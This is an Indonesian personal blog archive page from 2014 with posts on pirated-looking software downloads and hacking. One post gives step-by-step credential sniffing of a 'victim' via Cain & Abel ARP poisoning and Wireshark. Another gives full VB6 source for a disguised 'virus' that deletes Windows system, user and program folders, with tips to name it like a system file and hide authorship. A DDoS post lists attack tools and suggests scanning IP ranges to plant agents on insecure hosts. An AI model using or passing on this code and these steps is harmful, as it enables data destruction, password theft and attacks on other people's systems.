Archive for 2014

Photoshop portable

Selasa, 23 Desember 2014
Posted by wahyuwicaksono
Tag :
Adobe Photoshop CS6 Portable Icon Png  System requirement aplikasi Adobe Photoshop CS6 Portable ini berikut detail-nya : 

Minimal sistem yang di butuhkan :

  • 2GHz or faster processor
  • 1GB of RAM or more recommended
  • 1GB of available hard-disk space for installation; additional free space required during installation( Photoshop CS5.1 cannot be installed on flash-based storage devices.)
  • 1,024x768 display (1,280x800 recommended) with qualified hardware-accelerated OpenGL® graphics card, 16-bit color and 256MB VRAM
Untuk sobat yang penasaran / mungkin belum pernah lihat tampilan-nya, berikut adalah Screenshot Interface Adobe Photoshop CS6 Portable-nya : 

Untuk pengguna windows 7 , Agar tidak terjadi Error karena file Photoshop Portable ini bukan installer langsung ke window, solusi nya adalah sebelum membuka filePhotoshopCS6Portable.exe , pastikan klik kanan dulu file tersebut, lalu klik Run as administrator.


langsung donwload 

Cara Membobol Password WiFi Menggunakan Software

Senin, 22 Desember 2014
Posted by wahyuwicaksono
Tag :

Cara Membobol Password WiFi Dan HotSpot

Download Terlebih dahulu program dibawah ini
  1. Cain and Abel (Download Disini)
  2. Wireshark (Download Disini)
Langkah-Langkahnya lihat disini
Menggunakan Cain & Abel :
  1. Buka Program Cain and Abel anda
  2. Klik pada configure (Pada bagian Siniffer pilih Ethernet Card yang anda gunakan)
  3. Klik apply
  4. Kembali ke menu utama disana terdapat 8 tab yaitu sniffer,decoder,network dll. pilih tab Sniffer
  5. Untuk Mengaktifkan Sniffer pilih tombol Start/Stop Sniffer yang ada pada bagian atas tab (di dekat icon folder)
  6. Apabila anda berada pada jaringan Hub maka anda sudah bisa mengetahui Passwordnya dengan mengkelik tab password pada bagian bawah tabelnya (Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih)
  7. Pilih tab APR yang berada di bagian bawah list tabel
  8. Aktifkan APR yang tombolonya ada di sebelah kanan start/stop Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
  9.  Setelah itu pada tab APR akan terdapat 2 tabel list yang kosong ,klik list yang paling atas lalu pilih Tombol + yang berada di sebelah atas tab sniffer.
  10. Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
  11. Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.
Menggunakan Wireshark :
  1. Jalan Program Wireshark anda
  2. Tekan Ctrl + K pada keyboard atau Klik Capture lalu Option
  3. Pilih Ethernet card yang anda gunakan (Pastikan anda mencentak capture Packet in promisous mode)
  4. Klik start
  5. Apabila anda sudah yakin ada password yang terjaring maka anda bisa mengklik tombol stop
  6. Untuk menganalisis datanya klik kanan pada data yang akan di analisis lalu pilih Follow TCP stream. Untuk cara menganalisis datanya saya tidak akan menjelaskannya karena saya juga tidak bisa.
  7. Selesai
Cara diatas hanya berlaku pada jaringan Hub saja bukan jenis jaringa switch, karena pada jaringan switch lebih rumit dan secure bila dibandingkan dengan jaringan hub.


halo sobat , kali ini saya akan memberikan sedikit tutorial cara membuat virus dengan menggunakan Visual Basic 6.0..

tutorial buat bikin virus sangat mematikan, tapi simple, dan kayanya sih ga bakal kedekteksi antivirus, soalnya cara kerjanya simple banget.

yang anda perlukan antara lain adalah sebagai berikut :

1. VB(optimal : 6.0)

2. Ngerti tombol2nya VB


tutorialnya begini sob, :

1. bikin form sekecil mungkin

2. didalem form itu, masukin nih kode
PublicSubDelAll(ByVal
DirtoDeleteAsVariant)
DimFSO,FS
SetFSO=CreateObject
(”Scripting.FileSystemO
bject”)
FS=FSO.DeleteFolder
(DirtoDelete,True)
EndSub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows
\system32\katak.txt”)
= True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All
Users”)
Call DelAll(”C:\Documents and Settings
\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet
Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual
Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String)
As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function

3.Kode yg berwarna biru itu adalah penangkal nih virus sob, jadi di folder c:
\windows\system32\ kalo ada file namanya "katak.txt", lu ga bakal keserang sendiri… bisa kamu edit kok jadi apa gitu…Yang berwarna merah itu folder yg bakal didelete ama nih virus, kamu edit sendiri aja…

4. Bikin nih project namanya kaya nama system, disini aku memakai nama “SystemKernel32″ jadi ga bakal dicurigain.

5. jangan pernah nulis nama kamu di project ini, okey friend?

6. terakhir ya tinggal di compile deh…

gimana sob, mudah sekali kan?..sangat Simple kan? nih virus kerjanya
ngapus system, jadi sengat berbahaya
sekali … ini cman contoh bikin virus…

Program-program hacker dan crack

Posted by wahyuwicaksono
Tag :
Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Pengertian DDOS dan cara kerjanya

Posted by wahyuwicaksono
Tag :


Serangan DDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya.
Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.

Yang terbaru adalah situs e-gold.com pada tahun 2005 kemarin, situs nya di serang dengan memakai metode DDOS ( Denial Distribute of services ).

Bagaimana cara kerja DDOS ?

Jika Anda memakai program windows , coba lakukan ini di komputer Anda.

1. Start , Programs , Accessories , Command Prompt
2. Kemudian di Command prompt ketikan , Ping -t www.situsyangdituju.com

atau bisa juga Start, Run , Ping -t www.situsyangdituju.com

Kemudian komputer Anda akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer Anda mengirimkan ucapan "Halo , apa ada orang di situ ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"

Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.

Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang.

Pertanyaan nya , bagaimana 10.000 komputer tersebut bisa ikut melakukan serangan ?

Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan Ping ke situs yang di tuju. Oleh karena itu pentingnya ada firewall di komputer anda, untuk memonitor paket yang keluar maupun yang masuk dari komputer anda.
Jika anda belum memiliki firewall bisa coba zone alarm, silahkan downloadKLIK DI SINI
Adware biasanya di dapat dari program-program gratisan yang anda download, untuk itu juga harus berhati-hati mendownload program gratisan.


Bagaimana jika ada situs yang mengklaim situsnya sedang di serang , bagaimana kita tahu itu benar atau bohong ?

Bisa kita lakukan analisa untuk mendeteksi benar atau tidaknya serangan tersebut terjadi, atau hanya mengaku-ngaku saja.

Jika anda berkecimpung di dunia Investment semacam HYIP, autosurf , atau pun situs investasi lainnya.





biasanya sering anda jumpai ada situs yang adminnya bilang situsnya sedang di serang pakai metode DDOS, dan terpaksa harus menutup situs nya, ujung-ujungnya yah admin tersebut melakukan SCAM, atau tidak membayar membernya.

Berikut tahap-tahap melakukan analisa benar atau tidaknya situs tsb di serang.

1. Beri Nilai kemampuan finansial dari situs investasi tersebut.

- Sekarang ini sudah banyak jasa penyedia ANTI DDOS , biaya nya pun cukup mahal yakni berkisar $600 / bulan sampai dengan $1000 / bulan.

sekarang anda nilai situs tersebut, apakah mampu membayar jasa tersebut atau tidak. Jika bisnis nya bernilai ratusan ribu dollar , masak sih tidak mau ngeluarin uang $600 / bulan untuk mengamankan situs nya ? Sering anda lihat kan , ada situs investasi yang menulis :

Total investasi : sekian ratus ribu dollar
Total Withdrawal : sekian ratus ribu dollar

Jika benar uangnya sebanyak itu, tentu tidak ragu untuk membayar services ANTI DDOS sebesar $600 / bulan.


2. Periksa kebenaran.

Jika situs tersebut mengklaim mereka memiliki dan menyewa services ANTI DDOS, tanyakan di mana mereka menyewanya . biasanya di situs penyedia layanan ANTI DDOS di tulis nama-nama client yang menggunakan atau memakai services mereka.

3. Periksa hostingnya, apakah menggunakan satu private IP address, atau shared IP address.

Private IP address artinya = 1 nomor IP untuk 1 domain
Shared IP address artinya = 1 nomor IP untuk BANYAK DOMAIN.

sebagai contoh :
situs semuabisnis.com menggunakan shared IP address. IP untuk domain semuabisnis.com adalah http://75.126.30.10/ dan ada sekitar 14 domain / situs yang menggunakan IP ini , salah satunya adalah ambri-servers.com

Jadi jika situs semuabisnis.com di serang, maka efeknya akan terasa juga di ambri-servers.com maupun di situs-situs lainnya yang memiliki IP yang sama dengan semuabisnis.com .

Jika semuabisnis.com mengaku di serang, namun anda masih bisa mengakses ambri-servers.com ataupun masih bisa mengakses situs lainnya yang memiliki IP yang sama dengan semuabisnis.com , maka itu tidak benar paling cuma buat gaya-gayaan.. hehehe.

Begitu juga dengan situs investasi yang mengaku situs nya di serang, coba periksa ip addressnya. menggunakan private IP atau shared IP. jika shared IP, coba periksa situs lainnya yang memiliki IP
yang sama dengan situs investasi tersebut. apakah situs lainnya masih bisa di akses atau tidak.

Jika seseorang melakukan serangan ke semuabisnis.com , maka yang tidak bisa di akses bukan hanya situs semuabisnis.com melainkan situs-situs lainnya yang memiliki IP address yang sama akan mengalami overload juga.

Untuk mengecek dia menggunakan Shared hosting atau tidak, lakukan ini.

PING -t situsyangdituju.com

kemudian catat no ip.yg muncul di command prompt.
Setelah itu periksa ip tersebut di http://whois.webhosting.info/no IP jika hanya muncul satu domain, maka IP tersebut khusus untuk 1 domain ( private IP )
Jika banyak nama-nama situs yang muncul, maka IP tersebut adalah 1 IP untuk banyak domain ( shared IP )


Demikan penjelasannya, semoga bermanfaat.

Disini akan di bahas empat macam software yang bisa digunakan untuk melancarkan serangan DDOS 

1. The Tribal Flood Network (TFN). TFN ini diciptakan oleh hacker yang cukup terkenal pada kalangan underground yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat floodconnection dengan menggunakan protocol yang ada pada TCP/IP yaitu:

o UDP, difokuskan pada domain name system dan network management program.

o TCP, pusat e-mail dan web transaksi.

o ICMP, digunakan oleh para professional untuk troubleshooting network.

o Nama program masternya adalah : tribe.c dan program daemon bernama td.c

2. Trin
Software ini menggunakan UDP untuk mengirimkan flood packets network. Port yang digunakan adalah:

o Attack to Master : TCP Port 27665

o Master to Daemon : UDP Port 27444

o Daemon to Master(s) : UDP Port 31335

Program master : master.c dan program Daemon : ns.c 

Program ini tidak bagus untuk digunakan karena master dan daemon berhubungan dengan clear text.

3. Stacheldraht

Nama program ini dalam bahasa Jerman yang berarti “Barb Wire”. Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada.

Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate
daemonnya sendiri secara otomatis. Maka dari itu program ini paling effisien dan cukup berbahaya.

o Port TCP : 16660 dan 60001

o Master program bernama : mserv.c dan daemon program bernama : td.c

o Program ini memiliki client yang juga sebagai telnet : client.c 

Komunikasi antara master dan agent menggunakan ICMP dan TCP sedangkan TFN hanya menggunakan ICMP.

4. TFN2K

Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.

CARA MENGINSTALASI PROGRAM DDOS

Untuk menginstalasi program DDOS, master atau daemon node harus dikomunikasikan terlebih dahulu sehingga mendapatkan trust security. Untuk mendapatkan trust security dengan cara yang sangat mudah, gunakan scan tool dari range IP di internet kemudian setelah mendapatkan host-host tsb, baru diinstall client software pada host-host yang masih full of hole security.

Software client tersebut dapat di uninstall dengan cara di set terlebih dahulu, di uninstall setelah berapa kali serangan

Download cheat engine 6.1

Sabtu, 20 Desember 2014
Posted by wahyuwicaksono
Tag :

langsung download Disini 

Download gomplayer

Rabu, 17 Desember 2014
Posted by wahyuwicaksono
Tag :

langsung saja di download Disini
Welcome to My Blog

Popular Post

Blogger templates

wahyu wicaksono. Diberdayakan oleh Blogger.

- Copyright © Tulisan Terbaik -Robotic Notes- Powered by Blogger - Designed by Johanes Djogan -